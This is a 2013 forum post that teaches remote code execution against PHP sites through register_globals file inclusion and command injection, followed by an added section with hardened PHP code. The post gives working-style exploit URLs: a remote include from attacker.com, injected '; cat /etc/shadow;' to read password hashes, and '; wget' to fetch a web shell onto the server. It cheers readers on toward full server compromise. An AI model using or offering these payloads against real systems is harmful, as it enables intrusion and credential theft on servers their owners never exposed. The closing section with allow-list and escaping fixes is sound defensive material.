| Remote Code Execution | #1

As the name suggests, this vulnerability allows an attacker to run arbitrary, system-level code on the vulnerable server and retrieve any desired information contained therein. Improper coding errors lead to this vulnerability. This web application vulnerability is very hard to find, but if found you're in for a great treat : >


Basic overview of what causes this vulnerability:

Exploiting register_globals in PHP: register_globals is a PHP setting that controls the availability of "superglobal" variables in a PHP script (such as data posted from a user's form, URL-encoded data, or data from cookies). In earlier releases of PHP, register_globals was set to "on" by default, which made a developer's life easier, but this led to less secure coding and was widely exploited. When register_globals is set to "on" in php.ini, it can allow a user to initialize several previously uninitialized variables remotely. Many times an uninitialized parameter is used to include unwanted files from an attacker, and this could lead to the execution of arbitrary files from local/remote locations. For example:

PHP Code:
// $page is never initialized; with register_globals on, ?page=... fills it in
require($page . ".php");

Here if the $page parameter is not initialized and if register_globals is set to "on," the server will be vulnerable to remote code execution by including any arbitrary file in the $page parameter. Now let's look at the exploit code:
PHP Code:
http://www.vulnsite.com/index.php?page=http://www.attacker.com/attack.txt 
In this way, the file "http://www.attacker.com/attack.txt" will be included and executed on the server. It is a very simple but effective attack.

The attack.txt can be your shell, and you can use Live HTTP Headers and Tamper Data to get your shell to be a PHP file. But that's just something small you can do; sometimes you may have to add ";" (without quotes) to the front of the link and after.

Now how to use RCE to execute server commands:

PHP Code:
http://www.vulnsite.com/index?id=; ls; 

The command above will list all the files in the current directory that we are in, if you have the right privs. But most of the time you don't, so you have to know your way around a Linux-based server and use the "cat" command to read password files or MySQL files. But this would only be needed if you have low privs and can't "wget" anything to the server ("wget = upload", it's just the Linux command for it).

Example for using cat to read files:

PHP Code:
http://www.vulnsite.com/index?id=; cat /etc/shadow; 

This command will print out what is inside the shadow file, which is a password file.

Example to use wget to upload shell or exploit:

PHP Code:
http://www.vulnsite.com/index.php?id=; wget http://www.mysite.com/shell.php; 

As you can see, exploiting this vulnerability is easy. The real trick is for all the Windows users who don't know Unix environments and commands. I would become familiar with these commands and files because most web servers today are Unix-based. So the key is to look up basic Linux commands and get to know where the basic default password files and configuration files are on a web server. Do these things and this type of vuln can lead to full OS compromise or server compromise.

Good luck to you guys and hope this expands your knowledge on different types of web application vulnerabilities : >
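As an added example that is not part of the original post, the two bugs it describes (an include path built from a request parameter, and a shell command built from a request parameter) are shown beside hardened versions. The parameter names page and id come from the post's URLs; the PAGES table, the pages/ directory, records.txt and the grep lookup are assumptions made for illustration.

```php
<?php
// Added example, not code from the original post. Vulnerable handlers are
// kept next to their fixes so the difference is visible in one file.
declare(strict_types=1);

// --- Vulnerable pattern 1: include path built from request data -------------
// With register_globals on, ?page=... populates $page before this runs. The
// same bug exists without register_globals whenever $_GET['page'] is used
// directly. With allow_url_include on, ?page=http://www.attacker.com/attack.txt
// makes PHP fetch http://www.attacker.com/attack.txt.php, a URL the attacker's
// server controls, and execute whatever comes back.
function vulnerable_include(string $page): void
{
    require($page . '.php');
}

// --- Hardened pattern 1: allow-list, never build a path from user input ------
// Only values this table contains ever reach require(); the request parameter
// is used as a key, not as a path. (pages/ directory is an assumption.)
const PAGES = [
    'home'    => __DIR__ . '/pages/home.php',
    'about'   => __DIR__ . '/pages/about.php',
    'contact' => __DIR__ . '/pages/contact.php',
];

function safe_include(string $page): void
{
    if (!array_key_exists($page, PAGES)) {
        http_response_code(404);
        exit('unknown page');
    }
    require(PAGES[$page]);
}

// --- Vulnerable pattern 2: shell command built from request data ------------
// ?id=; cat /etc/shadow;  turns the command into
//     grep ; cat /etc/shadow; records.txt
// so the shell runs cat after grep fails. (records.txt is an assumption.)
function vulnerable_lookup(string $id): string
{
    $out = shell_exec('grep ' . $id . ' records.txt');
    return is_string($out) ? $out : '';
}

// --- Hardened pattern 2: validate the value, then escape it for the shell ---
// The regex rejects anything that is not a short digit string, and
// escapeshellarg() single-quotes the value so ; | ` $ and friends lose their
// meaning even if validation is later relaxed. Better still is to not touch
// the shell at all and query the data directly.
function safe_lookup(string $id): string
{
    if (!preg_match('/^[0-9]{1,10}$/', $id)) {
        throw new InvalidArgumentException('id must be a short positive integer');
    }
    $out = shell_exec('grep -F -- ' . escapeshellarg($id) . ' records.txt');
    return is_string($out) ? $out : '';
}

// php.ini settings behind the post's attack; register_globals itself was
// removed in PHP 5.4, but allow_url_include still governs remote includes:
//   register_globals  = Off
//   allow_url_include = Off
//   allow_url_fopen   = Off   ; unless the application genuinely needs it

// Usage from a request handler:
safe_include($_GET['page'] ?? 'home');
echo htmlspecialchars(safe_lookup($_GET['id'] ?? '0'), ENT_QUOTES, 'UTF-8');
```

The allow-list is the important half of the include fix: stripping "http://" or checking for ".." still leaves local file inclusion and wrapper tricks, whereas a fixed table of paths gives the attacker no string to control. For the command injection case, validation and escapeshellarg() together close the "; ls;" style injection the post shows, but the cleanest fix is to replace the shell call with a library call that takes the value as data.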





| Remote Code Execution | - by LEGITimacy™ - 01-23-2013, 06:14 AM